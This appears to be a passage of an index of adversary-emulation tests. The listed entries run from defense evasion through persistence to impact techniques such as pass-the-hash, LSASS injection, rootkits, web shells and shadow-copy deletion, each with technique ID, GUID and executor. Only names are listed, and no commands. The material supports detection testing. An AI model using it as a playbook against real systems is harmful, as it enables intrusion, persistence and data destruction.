403 defense-evasion T1027 Obfuscated Files or Information 6 DLP Evasion via Sensitive Data in VBA Macro over HTTP e2d85e66-cb66-4ed7-93b1-833fc56c9319 powershell
404 defense-evasion T1218.008 Odbcconf 1 Odbcconf.exe - Execute Arbitrary DLL 2430498b-06c0-4b92-a448-8ad263c388e2 command_prompt
405 defense-evasion T1134.004 Parent PID Spoofing 1 Parent PID Spoofing using PowerShell 069258f4-2162-46e9-9a25-c9c6c56150d2 powershell
406 defense-evasion T1134.004 Parent PID Spoofing 2 Parent PID Spoofing - Spawn from Current Process 14920ebd-1d61-491a-85e0-fe98efe37f25 powershell
407 defense-evasion T1134.004 Parent PID Spoofing 3 Parent PID Spoofing - Spawn from Specified Process cbbff285-9051-444a-9d17-c07cd2d230eb powershell
408 defense-evasion T1134.004 Parent PID Spoofing 4 Parent PID Spoofing - Spawn from svchost.exe e9f2b777-3123-430b-805d-5cedc66ab591 powershell
409 defense-evasion T1134.004 Parent PID Spoofing 5 Parent PID Spoofing - Spawn from New Process 2988133e-561c-4e42-a15f-6281e6a9b2db powershell
410 defense-evasion T1550.002 Pass the Hash 1 Mimikatz Pass the Hash ec23cef9-27d9-46e4-a68d-6f75f7b86908 command_prompt
411 defense-evasion T1550.002 Pass the Hash 2 crackmapexec Pass the Hash eb05b028-16c8-4ad8-adea-6f5b219da9a9 command_prompt
412 defense-evasion T1550.003 Pass the Ticket 1 Mimikatz Kerberos Ticket Attack dbf38128-7ba7-4776-bedf-cc2eed432098 command_prompt
413 defense-evasion T1556.002 Password Filter DLL 1 Install and Register Password Filter DLL a7961770-beb5-4134-9674-83d7e1fa865c powershell
414 defense-evasion T1574.009 Path Interception by Unquoted Path 1 Execution of program.exe as service with unquoted service path 2770dea7-c50f-457b-84c4-c40a47460d9f command_prompt
415 defense-evasion T1055.012 Process Hollowing 1 Process Hollowing using PowerShell 562427b4-39ef-4e8c-af88-463a78e70b9c powershell
416 defense-evasion T1055.012 Process Hollowing 2 RunPE via VBA 3ad4a037-1598-4136-837c-4027e4fa319b powershell
417 defense-evasion T1055 Process Injection 1 Shellcode execution via VBA 1c91e740-1729-4329-b779-feba6e71d048 powershell
418 defense-evasion T1055 Process Injection 2 Remote Process Injection in LSASS via mimikatz 3203ad24-168e-4bec-be36-f79b13ef8a83 command_prompt
419 defense-evasion T1216.001 PubPrn 1 PubPrn.vbs Signed Script Bypass 9dd29a1f-1e16-4862-be83-913b10a88f6c command_prompt
420 defense-evasion T1218.009 Regsvcs/Regasm 1 Regasm Uninstall Method Call Test 71bfbfac-60b1-4fc0-ac8b-2cedbbdcb112 command_prompt
421 defense-evasion T1218.009 Regsvcs/Regasm 2 Regsvcs Uninstall Method Call Test fd3c1c6a-02d2-4b72-82d9-71c527abb126 powershell
422 defense-evasion T1218.010 Regsvr32 1 Regsvr32 local COM scriptlet execution 449aa403-6aba-47ce-8a37-247d21ef0306 command_prompt
423 defense-evasion T1218.010 Regsvr32 2 Regsvr32 remote COM scriptlet execution c9d0c4ef-8a96-4794-a75b-3d3a5e6f2a36 command_prompt
424 defense-evasion T1218.010 Regsvr32 3 Regsvr32 local DLL execution 08ffca73-9a3d-471a-aeb0-68b4aa3ab37b command_prompt
425 defense-evasion T1218.010 Regsvr32 4 Regsvr32 Registering Non DLL 1ae5ea1f-0a4e-4e54-b2f5-4ac328a7f421 command_prompt
426 defense-evasion T1218.010 Regsvr32 5 Regsvr32 Silent DLL Install Call DllRegisterServer 9d71c492-ea2e-4c08-af16-c6994cdf029f command_prompt
427 defense-evasion T1036.003 Rename System Utilities 1 Masquerading as Windows LSASS process 5ba5a3d1-cf3c-4499-968a-a93155d1f717 command_prompt
428 defense-evasion T1036.003 Rename System Utilities 2 Masquerading as Linux crond process. a315bfff-7a98-403b-b442-2ea1b255e556 sh
429 defense-evasion T1036.003 Rename System Utilities 3 Masquerading - cscript.exe running as notepad.exe 3a2a578b-0a01-46e4-92e3-62e2859b42f0 command_prompt
430 defense-evasion T1036.003 Rename System Utilities 4 Masquerading - wscript.exe running as svchost.exe 24136435-c91a-4ede-9da1-8b284a1c1a23 command_prompt
431 defense-evasion T1036.003 Rename System Utilities 5 Masquerading - powershell.exe running as taskhostw.exe ac9d0fc3-8aa8-4ab5-b11f-682cd63b40aa command_prompt
432 defense-evasion T1036.003 Rename System Utilities 6 Masquerading - non-windows exe running as windows exe bc15c13f-d121-4b1f-8c7d-28d95854d086 powershell
433 defense-evasion T1036.003 Rename System Utilities 7 Masquerading - windows exe running as different windows exe c3d24a39-2bfe-4c6a-b064-90cd73896cb0 powershell
434 defense-evasion T1036.003 Rename System Utilities 8 Malicious process Masquerading as LSM.exe 83810c46-f45e-4485-9ab6-8ed0e9e6ed7f command_prompt
435 defense-evasion T1036.003 Rename System Utilities 9 File Extension Masquerading c7fa0c3b-b57f-4cba-9118-863bf4e653fc command_prompt
436 defense-evasion T1207 Rogue Domain Controller 1 DCShadow (Active Directory) 0f4c5eb0-98a0-4496-9c3d-656b4f2bc8f6 powershell
437 defense-evasion T1014 Rootkit 1 Loadable Kernel Module based Rootkit dfb50072-e45a-4c75-a17e-a484809c8553 sh
438 defense-evasion T1014 Rootkit 2 Loadable Kernel Module based Rootkit 75483ef8-f10f-444a-bf02-62eb0e48db6f sh
439 defense-evasion T1014 Rootkit 3 Windows Signed Driver Rootkit Test 8e4e1985-9a19-4529-b4b8-b7a49ff87fae command_prompt
440 defense-evasion T1218.011 Rundll32 1 Rundll32 execute JavaScript Remote Payload With GetObject cf3bdb9a-dd11-4b6c-b0d0-9e22b68a71be command_prompt
441 defense-evasion T1218.011 Rundll32 2 Rundll32 execute VBscript command 638730e7-7aed-43dc-bf8c-8117f805f5bb command_prompt
442 defense-evasion T1218.011 Rundll32 3 Rundll32 advpack.dll Execution d91cae26-7fc1-457b-a854-34c8aad48c89 command_prompt
443 defense-evasion T1218.011 Rundll32 4 Rundll32 ieadvpack.dll Execution 5e46a58e-cbf6-45ef-a289-ed7754603df9 command_prompt
444 defense-evasion T1218.011 Rundll32 5 Rundll32 syssetup.dll Execution 41fa324a-3946-401e-bbdd-d7991c628125 command_prompt
445 defense-evasion T1218.011 Rundll32 6 Rundll32 setupapi.dll Execution 71d771cd-d6b3-4f34-bc76-a63d47a10b19 command_prompt
446 defense-evasion T1218.011 Rundll32 7 Execution of HTA and VBS Files using Rundll32 and URL.dll 22cfde89-befe-4e15-9753-47306b37a6e3 command_prompt
447 defense-evasion T1218.011 Rundll32 8 Launches an executable using Rundll32 and pcwutl.dll 9f5d081a-ee5a-42f9-a04e-b7bdc487e676 command_prompt
448 defense-evasion T1574.011 Services Registry Permissions Weakness 1 Service Registry Permissions Weakness f7536d63-7fd4-466f-89da-7e48d550752a powershell
449 defense-evasion T1574.011 Services Registry Permissions Weakness 2 Service ImagePath Change with reg.exe f38e9eea-e1d7-4ba6-b716-584791963827 command_prompt
450 defense-evasion T1548.001 Setuid and Setgid 1 Make and modify binary from C source 896dfe97-ae43-4101-8e96-9a7996555d80 sh
451 defense-evasion T1548.001 Setuid and Setgid 2 Set a SetUID flag on file 759055b3-3885-4582-a8ec-c00c9d64dd79 sh
452 defense-evasion T1548.001 Setuid and Setgid 3 Set a SetGID flag on file db55f666-7cba-46c6-9fe6-205a05c3242c sh
453 defense-evasion T1218 Signed Binary Proxy Execution 1 mavinject - Inject DLL into running process c426dacf-575d-4937-8611-a148a86a5e61 command_prompt
454 defense-evasion T1218 Signed Binary Proxy Execution 2 SyncAppvPublishingServer - Execute arbitrary PowerShell code d590097e-d402-44e2-ad72-2c6aa1ce78b1 command_prompt
455 defense-evasion T1218 Signed Binary Proxy Execution 3 Register-CimProvider - Execute evil dll ad2c17ed-f626-4061-b21e-b9804a6f3655 command_prompt
456 defense-evasion T1218 Signed Binary Proxy Execution 4 InfDefaultInstall.exe .inf Execution 54ad7d5a-a1b5-472c-b6c4-f8090fb2daef command_prompt
457 defense-evasion T1218 Signed Binary Proxy Execution 5 ProtocolHandler.exe Downloaded a Suspicious File db020456-125b-4c8b-a4a7-487df8afb5a2 command_prompt
458 defense-evasion T1218 Signed Binary Proxy Execution 6 Microsoft.Workflow.Compiler.exe Payload Execution 7cbb0f26-a4c1-4f77-b180-a009aa05637e powershell
459 defense-evasion T1218 Signed Binary Proxy Execution 7 Renamed Microsoft.Workflow.Compiler.exe Payload Executions 4cc40fd7-87b8-4b16-b2d7-57534b86b911 powershell
460 defense-evasion T1218 Signed Binary Proxy Execution 8 Invoke-ATHRemoteFXvGPUDisablementCommand base test 9ebe7901-7edf-45c0-b5c7-8366300919db powershell
461 defense-evasion T1216 Signed Script Proxy Execution 1 SyncAppvPublishingServer Signed Script PowerShell Command Execution 275d963d-3f36-476c-8bef-a2a3960ee6eb command_prompt
462 defense-evasion T1216 Signed Script Proxy Execution 2 manage-bde.wsf Signed Script Command Execution 2a8f2d3c-3dec-4262-99dd-150cb2a4d63a command_prompt
463 defense-evasion T1027.002 Software Packing 1 Binary simply packed by UPX (linux) 11c46cd8-e471-450e-acb8-52a1216ae6a4 sh
464 defense-evasion T1027.002 Software Packing 2 Binary packed by UPX, with modified headers (linux) f06197f8-ff46-48c2-a0c6-afc1b50665e1 sh
465 defense-evasion T1027.002 Software Packing 3 Binary simply packed by UPX b16ef901-00bb-4dda-b4fc-a04db5067e20 sh
466 defense-evasion T1027.002 Software Packing 4 Binary packed by UPX, with modified headers 4d46e16b-5765-4046-9f25-a600d3e65e4d sh
467 defense-evasion T1036.006 Space after Filename 1 Space After Filename 89a7dd26-e510-4c9f-9b15-f3bae333360f manual
468 defense-evasion T1548.003 Sudo and Sudo Caching 1 Sudo usage 150c3a08-ee6e-48a6-aeaf-3659d24ceb4e sh
469 defense-evasion T1548.003 Sudo and Sudo Caching 2 Unlimited sudo cache timeout a7b17659-dd5e-46f7-b7d1-e6792c91d0bc sh
470 defense-evasion T1548.003 Sudo and Sudo Caching 3 Disable tty_tickets for sudo caching 91a60b03-fb75-4d24-a42e-2eb8956e8de1 sh
471 defense-evasion T1497.001 System Checks 1 Detect Virtualization Environment (Linux) dfbd1a21-540d-4574-9731-e852bd6fe840 sh
472 defense-evasion T1497.001 System Checks 2 Detect Virtualization Environment (Windows) 502a7dc4-9d6f-4d28-abf2-f0e84692562d powershell
473 defense-evasion T1497.001 System Checks 3 Detect Virtualization Environment (MacOS) a960185f-aef6-4547-8350-d1ce16680d09 sh
474 defense-evasion T1221 Template Injection 1 WINWORD Remote Template Injection 1489e08a-82c7-44ee-b769-51b72d03521d command_prompt
475 defense-evasion T1070.006 Timestomp 1 Set a file's access timestamp 5f9113d5-ed75-47ed-ba23-ea3573d05810 sh
476 defense-evasion T1070.006 Timestomp 2 Set a file's modification timestamp 20ef1523-8758-4898-b5a2-d026cc3d2c52 sh
477 defense-evasion T1070.006 Timestomp 3 Set a file's creation timestamp 8164a4a6-f99c-4661-ac4f-80f5e4e78d2b sh
478 defense-evasion T1070.006 Timestomp 4 Modify file timestamps using reference file 631ea661-d661-44b0-abdb-7a7f3fc08e50 sh
479 defense-evasion T1070.006 Timestomp 5 Windows - Modify file creation timestamp with PowerShell b3b2c408-2ff0-4a33-b89b-1cb46a9e6a9c powershell
480 defense-evasion T1070.006 Timestomp 6 Windows - Modify file last modified timestamp with PowerShell f8f6634d-93e1-4238-8510-f8a90a20dcf2 powershell
481 defense-evasion T1070.006 Timestomp 7 Windows - Modify file last access timestamp with PowerShell da627f63-b9bd-4431-b6f8-c5b44d061a62 powershell
482 defense-evasion T1070.006 Timestomp 8 Windows - Timestomp a File d7512c33-3a75-4806-9893-69abc3ccdd43 powershell
483 defense-evasion T1134.001 Token Impersonation/Theft 1 Named pipe client impersonation 90db9e27-8e7c-4c04-b602-a45927884966 powershell
484 defense-evasion T1134.001 Token Impersonation/Theft 2 `SeDebugPrivilege` token duplication 34f0a430-9d04-4d98-bcb5-1989f14719f0 powershell
485 defense-evasion T1222.001 Windows File and Directory Permissions Modification 1 Take ownership using takeown utility 98d34bb4-6e75-42ad-9c41-1dae7dc6a001 command_prompt
486 defense-evasion T1222.001 Windows File and Directory Permissions Modification 2 cacls - Grant permission to specified user or group recursively a8206bcc-f282-40a9-a389-05d9c0263485 command_prompt
487 defense-evasion T1222.001 Windows File and Directory Permissions Modification 3 attrib - Remove read-only attribute bec1e95c-83aa-492e-ab77-60c71bbd21b0 command_prompt
488 defense-evasion T1222.001 Windows File and Directory Permissions Modification 4 attrib - hide file 32b979da-7b68-42c9-9a99-0e39900fc36c command_prompt
489 defense-evasion T1222.001 Windows File and Directory Permissions Modification 5 Grant Full Access to folder for Everyone - Ryuk Ransomware Style ac7e6118-473d-41ec-9ac0-ef4f1d1ed2f6 command_prompt
490 defense-evasion T1220 XSL Script Processing 1 MSXSL Bypass using local files ca23bfb2-023f-49c5-8802-e66997de462d command_prompt
491 defense-evasion T1220 XSL Script Processing 2 MSXSL Bypass using remote files a7c3ab07-52fb-49c8-ab6d-e9c6d4a0a985 command_prompt
492 defense-evasion T1220 XSL Script Processing 3 WMIC bypass using local XSL file 1b237334-3e21-4a0c-8178-b8c996124988 command_prompt
493 defense-evasion T1220 XSL Script Processing 4 WMIC bypass using remote XSL file 7f5be499-33be-4129-a560-66021f379b9b command_prompt
494 persistence T1546.008 Accessibility Features 1 Attaches Command Prompt as a Debugger to a List of Target Processes 3309f53e-b22b-4eb6-8fd2-a6cf58b355a9 powershell
495 persistence T1546.008 Accessibility Features 2 Replace binary of sticky keys 934e90cf-29ca-48b3-863c-411737ad44e3 command_prompt
496 persistence T1098 Account Manipulation 1 Admin Account Manipulate 5598f7cb-cf43-455e-883a-f6008c5d46af powershell
497 persistence T1098 Account Manipulation 2 Domain Account and Group Manipulate a55a22e9-a3d3-42ce-bd48-2653adb8f7a9 powershell
498 persistence T1098 Account Manipulation 3 AWS - Create a group and add a user to that group 8822c3b0-d9f9-4daf-a043-49f110a31122 sh
499 persistence T1098.001 Additional Cloud Credentials 1 Azure AD Application Hijacking - Service Principal b8e747c3-bdf7-4d71-bce2-f1df2a057406 powershell
500 persistence T1098.001 Additional Cloud Credentials 2 Azure AD Application Hijacking - App Registration a12b5531-acab-4618-a470-0dafb294a87a powershell
501 persistence T1098.001 Additional Cloud Credentials 3 AWS - Create Access Key and Secret Key 8822c3b0-d9f9-4daf-a043-491160a31122 sh
502 persistence T1546.010 AppInit DLLs 1 Install AppInit Shim a58d9386-3080-4242-ab5f-454c16503d18 command_prompt
503 persistence T1546.011 Application Shimming 1 Application Shim Installation 9ab27e22-ee62-4211-962b-d36d9a0e6a18 command_prompt
504 persistence T1546.011 Application Shimming 2 New shim database files created in the default shim database directory aefd6866-d753-431f-a7a4-215ca7e3f13d powershell
505 persistence T1546.011 Application Shimming 3 Registry key creation and/or modification events for SDB 9b6a06f9-ab5e-4e8d-8289-1df4289db02f powershell
506 persistence T1053.001 At (Linux) 1 At - Schedule a job 7266d898-ac82-4ec0-97c7-436075d0d08e sh
507 persistence T1053.002 At (Windows) 1 At.exe Scheduled task 4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8 command_prompt
508 persistence T1197 BITS Jobs 1 Bitsadmin Download (cmd) 3c73d728-75fb-4180-a12f-6712864d7421 command_prompt
509 persistence T1197 BITS Jobs 2 Bitsadmin Download (PowerShell) f63b8bc4-07e5-4112-acba-56f646f3f0bc powershell
510 persistence T1197 BITS Jobs 3 Persist, Download, & Execute 62a06ec5-5754-47d2-bcfc-123d8314c6ae command_prompt
511 persistence T1197 BITS Jobs 4 Bits download using desktopimgdownldr.exe (cmd) afb5e09e-e385-4dee-9a94-6ee60979d114 command_prompt
512 persistence T1176 Browser Extensions 1 Chrome (Developer Mode) 3ecd790d-2617-4abf-9a8c-4e8d47da9ee1 manual
513 persistence T1176 Browser Extensions 2 Chrome (Chrome Web Store) 4c83940d-8ca5-4bb2-8100-f46dc914bc3f manual
514 persistence T1176 Browser Extensions 3 Firefox cb790029-17e6-4c43-b96f-002ce5f10938 manual
515 persistence T1176 Browser Extensions 4 Edge Chromium Addon - VPN 3d456e2b-a7db-4af8-b5b3-720e7c4d9da5 manual
516 persistence T1574.012 COR_PROFILER 1 User scope COR_PROFILER 9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a powershell
517 persistence T1574.012 COR_PROFILER 2 System Scope COR_PROFILER f373b482-48c8-4ce4-85ed-d40c8b3f7310 powershell
518 persistence T1574.012 COR_PROFILER 3 Registry-free process scope COR_PROFILER 79d57242-bbef-41db-b301-9d01d9f6e817 powershell
519 persistence T1546.001 Change Default File Association 1 Change Default File Association 10a08978-2045-4d62-8c42-1957bbbea102 command_prompt
520 persistence T1136.003 Cloud Account 1 AWS - Create a new IAM user 8d1c2368-b503-40c9-9057-8e42f21c58ad sh
521 persistence T1053.007 Container Orchestration Job 1 ListCronjobs ddfb0bc1-3c3f-47e9-a298-550ecfefacbd bash
522 persistence T1053.007 Container Orchestration Job 2 CreateCronjob f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3 bash
523 persistence T1053.003 Cron 1 Cron - Replace crontab with referenced file 435057fb-74b1-410e-9403-d81baf194f75 bash
524 persistence T1053.003 Cron 2 Cron - Add script to all cron subfolders b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0 bash
525 persistence T1053.003 Cron 3 Cron - Add script to /var/spool/cron/crontabs/ folder 2d943c18-e74a-44bf-936f-25ade6cccab4 bash
526 persistence T1574.001 DLL Search Order Hijacking 1 DLL Search Order Hijacking - amsi.dll 8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3 command_prompt
527 persistence T1574.002 DLL Side-Loading 1 DLL Side-Loading using the Notepad++ GUP.exe binary 65526037-7079-44a9-bda1-2cb624838040 command_prompt
528 persistence T1078.001 Default Accounts 1 Enable Guest account with RDP capability and admin priviliges 99747561-ed8d-47f2-9c91-1e5fde1ed6e0 command_prompt
529 persistence T1136.002 Domain Account 1 Create a new Windows domain admin user fcec2963-9951-4173-9bfa-98d8b7834e62 command_prompt
530 persistence T1136.002 Domain Account 2 Create a new account similar to ANONYMOUS LOGON dc7726d2-8ccb-4cc6-af22-0d5afb53a548 command_prompt
531 persistence T1136.002 Domain Account 3 Create a new Domain Account using PowerShell 5a3497a4-1568-4663-b12a-d4a5ed70c7d7 powershell
532 persistence T1574.006 Dynamic Linker Hijacking 1 Shared Library Injection via /etc/ld.so.preload 39cb0e67-dd0d-4b74-a74b-c072db7ae991 bash
533 persistence T1574.006 Dynamic Linker Hijacking 2 Shared Library Injection via LD_PRELOAD bc219ff7-789f-4d51-9142-ecae3397deae bash
534 persistence T1546.014 Emond 1 Persistance with Event Monitor - emond 23c9c127-322b-4c75-95ca-eff464906114 sh
535 persistence T1133 External Remote Services 1 Running Chrome VPN Extensions via the Registry 2 vpn extension 4c8db261-a58b-42a6-a866-0a294deedde4 powershell
536 persistence T1546.012 Image File Execution Options Injection 1 IFEO Add Debugger fdda2626-5234-4c90-b163-60849a24c0b8 command_prompt
537 persistence T1546.012 Image File Execution Options Injection 2 IFEO Global Flags 46b1f278-c8ee-4aa5-acce-65e77b11f3c1 command_prompt
538 persistence T1547.006 Kernel Modules and Extensions 1 Linux - Load Kernel Module via insmod 687dcb93-9656-4853-9c36-9977315e9d23 bash
539 persistence T1543.001 Launch Agent 1 Launch Agent a5983dee-bf6c-4eaf-951c-dbc1a7b90900 bash
540 persistence T1543.004 Launch Daemon 1 Launch Daemon 03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf bash
541 persistence T1053.004 Launchd 1 Event Monitor Daemon Persistence 11979f23-9b9d-482a-9935-6fc9cd022c3e bash
542 persistence T1136.001 Local Account 1 Create a user account on a Linux system 40d8eabd-e394-46f6-8785-b9bfa1d011d2 bash
543 persistence T1136.001 Local Account 2 Create a user account on a MacOS system 01993ba5-1da3-4e15-a719-b690d4f0f0b2 bash
544 persistence T1136.001 Local Account 3 Create a new user in a command prompt 6657864e-0323-4206-9344-ac9cd7265a4f command_prompt
545 persistence T1136.001 Local Account 4 Create a new user in PowerShell bc8be0ac-475c-4fbf-9b1d-9fffd77afbde powershell
546 persistence T1136.001 Local Account 5 Create a new user in Linux with `root` UID and GID. a1040a30-d28b-4eda-bd99-bb2861a4616c bash
547 persistence T1136.001 Local Account 6 Create a new Windows admin user fda74566-a604-4581-a4cc-fbbe21d66559 command_prompt
548 persistence T1078.003 Local Accounts 1 Create local account with admin priviliges a524ce99-86de-4db6-b4f9-e08f35a47a15 command_prompt
549 persistence T1037.002 Logon Script (Mac) 1 Logon Scripts - Mac f047c7de-a2d9-406e-a62b-12a09d9516f4 manual
550 persistence T1037.001 Logon Script (Windows) 1 Logon Scripts d6042746-07d4-4c92-9ad8-e644c114a231 command_prompt
551 persistence T1546.007 Netsh Helper DLL 1 Netsh Helper DLL Registration 3244697d-5a3a-4dfc-941c-550f69f91a4d command_prompt
552 persistence T1137 Office Application Startup 1 Office Application Startup - Outlook as a C2 bfe6ac15-c50b-4c4f-a186-0fc6b8ba936c command_prompt
553 persistence T1137.002 Office Test 1 Office Application Startup Test Persistence c3e35b58-fe1c-480b-b540-7600fb612563 command_prompt
554 persistence T1137.004 Outlook Home Page 1 Install Outlook Home Page Persistence 7a91ad51-e6d2-4d43-9471-f26362f5738e command_prompt
555 persistence T1556.002 Password Filter DLL 1 Install and Register Password Filter DLL a7961770-beb5-4134-9674-83d7e1fa865c powershell
556 persistence T1574.009 Path Interception by Unquoted Path 1 Execution of program.exe as service with unquoted service path 2770dea7-c50f-457b-84c4-c40a47460d9f command_prompt
557 persistence T1547.011 Plist Modification 1 Plist Modification 394a538e-09bb-4a4a-95d1-b93cf12682a8 manual
558 persistence T1547.010 Port Monitors 1 Add Port Monitor persistence in Registry d34ef297-f178-4462-871e-9ce618d44e50 command_prompt
559 persistence T1546.013 PowerShell Profile 1 Append malicious start-process cmdlet 090e5aa5-32b6-473b-a49b-21e843a56896 powershell
560 persistence T1037.004 RC Scripts 1 rc.common 97a48daa-8bca-4bc0-b1a9-c1d163e762de bash
561 persistence T1037.004 RC Scripts 2 rc.common c33f3d80-5f04-419b-a13a-854d1cbdbf3a bash
562 persistence T1037.004 RC Scripts 3 rc.local 126f71af-e1c9-405c-94ef-26a47b16c102 bash
563 persistence T1547.007 Re-opened Applications 1 Re-Opened Applications 5fefd767-ef54-4ac6-84d3-751ab85e8aba manual
564 persistence T1547.007 Re-opened Applications 2 Re-Opened Applications 5f5b71da-e03f-42e7-ac98-d63f9e0465cb sh
565 persistence T1547.001 Registry Run Keys / Startup Folder 1 Reg Key Run e55be3fd-3521-4610-9d1a-e210e42dcf05 command_prompt
566 persistence T1547.001 Registry Run Keys / Startup Folder 2 Reg Key RunOnce 554cbd88-cde1-4b56-8168-0be552eed9eb command_prompt
567 persistence T1547.001 Registry Run Keys / Startup Folder 3 PowerShell Registry RunOnce eb44f842-0457-4ddc-9b92-c4caa144ac42 powershell
568 persistence T1547.001 Registry Run Keys / Startup Folder 4 Suspicious vbs file run from startup Folder 2cb98256-625e-4da9-9d44-f2e5f90b8bd5 powershell
569 persistence T1547.001 Registry Run Keys / Startup Folder 5 Suspicious jse file run from startup Folder dade9447-791e-4c8f-b04b-3a35855dfa06 powershell
570 persistence T1547.001 Registry Run Keys / Startup Folder 6 Suspicious bat file run from startup Folder 5b6768e4-44d2-44f0-89da-a01d1430fd5e powershell
571 persistence T1547.001 Registry Run Keys / Startup Folder 7 Add Executable Shortcut Link to User Startup Folder 24e55612-85f6-4bd6-ae74-a73d02e3441d powershell
572 persistence T1098.004 SSH Authorized Keys 1 Modify SSH Authorized Keys 342cc723-127c-4d3a-8292-9c0c6b4ecadc bash
573 persistence T1053.005 Scheduled Task 1 Scheduled Task Startup Script fec27f65-db86-4c2d-b66c-61945aee87c2 command_prompt
574 persistence T1053.005 Scheduled Task 2 Scheduled task Local 42f53695-ad4a-4546-abb6-7d837f644a71 command_prompt
575 persistence T1053.005 Scheduled Task 3 Scheduled task Remote 2e5eac3e-327b-4a88-a0c0-c4057039a8dd command_prompt
576 persistence T1053.005 Scheduled Task 4 Powershell Cmdlet Scheduled Task af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd powershell
577 persistence T1053.005 Scheduled Task 5 Task Scheduler via VBA ecd3fa21-7792-41a2-8726-2c5c673414d3 powershell
578 persistence T1053.005 Scheduled Task 6 WMI Invoke-CimMethod Scheduled Task e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b powershell
579 persistence T1546.002 Screensaver 1 Set Arbitrary Binary as Screensaver 281201e7-de41-4dc9-b73d-f288938cbb64 command_prompt
580 persistence T1547.005 Security Support Provider 1 Modify SSP configuration in registry afdfd7e3-8a0b-409f-85f7-886fdf249c9e powershell
581 persistence T1574.011 Services Registry Permissions Weakness 1 Service Registry Permissions Weakness f7536d63-7fd4-466f-89da-7e48d550752a powershell
582 persistence T1574.011 Services Registry Permissions Weakness 2 Service ImagePath Change with reg.exe f38e9eea-e1d7-4ba6-b716-584791963827 command_prompt
583 persistence T1547.009 Shortcut Modification 1 Shortcut Modification ce4fc678-364f-4282-af16-2fb4c78005ce command_prompt
584 persistence T1547.009 Shortcut Modification 2 Create shortcut to cmd in startup folders cfdc954d-4bb0-4027-875b-a1893ce406f2 powershell
585 persistence T1037.005 Startup Items 1 Add file to Local Library StartupItems 134627c3-75db-410e-bff8-7a920075f198 sh
586 persistence T1543.002 Systemd Service 1 Create Systemd Service d9e4f24f-aa67-4c6e-bcbf-85622b697a7c bash
587 persistence T1543.002 Systemd Service 2 Create Systemd Service file, Enable the service , Modify and Reload the service. c35ac4a8-19de-43af-b9f8-755da7e89c89 bash
588 persistence T1053.006 Systemd Timers 1 Create Systemd Service and Timer f4983098-bb13-44fb-9b2c-46149961807b bash
589 persistence T1505.002 Transport Agent 1 Install MS Exchange Transport Agent Persistence 43e92449-ff60-46e9-83a3-1a38089df94d powershell
590 persistence T1546.005 Trap 1 Trap a74b2e07-5952-4c03-8b56-56274b076b61 sh
591 persistence T1546.004 Unix Shell Configuration Modification 1 Add command to .bash_profile 94500ae1-7e31-47e3-886b-c328da46872f sh
592 persistence T1546.004 Unix Shell Configuration Modification 2 Add command to .bashrc 0a898315-4cfa-4007-bafe-33a4646d115f sh
593 persistence T1505.003 Web Shell 1 Web Shell Written to Disk 0a2ce662-1efa-496f-a472-2fe7b080db16 command_prompt
594 persistence T1546.003 Windows Management Instrumentation Event Subscription 1 Persistence via WMI Event Subscription 3c64f177-28e2-49eb-a799-d767b24dd1e0 powershell
595 persistence T1543.003 Windows Service 1 Modify Fax service to run PowerShell ed366cde-7d12-49df-a833-671904770b9f command_prompt
596 persistence T1543.003 Windows Service 2 Service Installation CMD 981e2942-e433-44e9-afc1-8c957a1496b6 command_prompt
597 persistence T1543.003 Windows Service 3 Service Installation PowerShell 491a4af6-a521-4b74-b23b-f7b3f1ee9e77 powershell
598 persistence T1547.004 Winlogon Helper DLL 1 Winlogon Shell Key Persistence - PowerShell bf9f9d65-ee4d-4c3e-a843-777d04f19c38 powershell
599 persistence T1547.004 Winlogon Helper DLL 2 Winlogon Userinit Key Persistence - PowerShell fb32c935-ee2e-454b-8fa3-1c46b42e8dfb powershell
600 persistence T1547.004 Winlogon Helper DLL 3 Winlogon Notify Key Logon Persistence - PowerShell d40da266-e073-4e5a-bb8b-2b385023e5f9 powershell
601 impact T1531 Account Access Removal 1 Change User Password - Windows 1b99ef28-f83c-4ec5-8a08-1a56263a5bb2 command_prompt
602 impact T1531 Account Access Removal 2 Delete User - Windows f21a1d7d-a62f-442a-8c3a-2440d43b19e5 command_prompt
603 impact T1531 Account Access Removal 3 Remove Account From Domain Admin Group 43f71395-6c37-498e-ab17-897d814a0947 powershell
604 impact T1485 Data Destruction 1 Windows - Overwrite file with Sysinternals SDelete 476419b5-aebf-4366-a131-ae3e8dae5fc2 powershell
605 impact T1485 Data Destruction 2 macOS/Linux - Overwrite file with DD 38deee99-fd65-4031-bec8-bfa4f9f26146 bash
606 impact T1486 Data Encrypted for Impact 1 Encrypt files using gpg (Linux) 7b8ce084-3922-4618-8d22-95f996173765 bash
607 impact T1486 Data Encrypted for Impact 2 Encrypt files using 7z (Linux) 53e6735a-4727-44cc-b35b-237682a151ad bash
608 impact T1486 Data Encrypted for Impact 3 Encrypt files using ccrypt (Linux) 08cbf59f-85da-4369-a5f4-049cffd7709f bash
609 impact T1486 Data Encrypted for Impact 4 Encrypt files using openssl (Linux) 142752dc-ca71-443b-9359-cf6f497315f1 bash
610 impact T1486 Data Encrypted for Impact 5 PureLocker Ransom Note 649349c7-9abf-493b-a7a2-b1aa4d141528 command_prompt
611 impact T1490 Inhibit System Recovery 1 Windows - Delete Volume Shadow Copies 43819286-91a9-4369-90ed-d31fb4da2c01 command_prompt
612 impact T1490 Inhibit System Recovery 2 Windows - Delete Volume Shadow Copies via WMI 6a3ff8dd-f49c-4272-a658-11c2fe58bd88 command_prompt
613 impact T1490 Inhibit System Recovery 3 Windows - wbadmin Delete Windows Backup Catalog 263ba6cb-ea2b-41c9-9d4e-b652dadd002c command_prompt
614 impact T1490 Inhibit System Recovery 4 Windows - Disable Windows Recovery Console Repair cf21060a-80b3-4238-a595-22525de4ab81 command_prompt
615 impact T1490 Inhibit System Recovery 5 Windows - Delete Volume Shadow Copies via WMI with PowerShell 39a295ca-7059-4a88-86f6-09556c1211e7 powershell
616 impact T1490 Inhibit System Recovery 6 Windows - Delete Backup Files 6b1dbaf6-cc8a-4ea6-891f-6058569653bf command_prompt
617 impact T1490 Inhibit System Recovery 7 Windows - wbadmin Delete systemstatebackup 584331dd-75bc-4c02-9e0b-17f5fd81c748 command_prompt
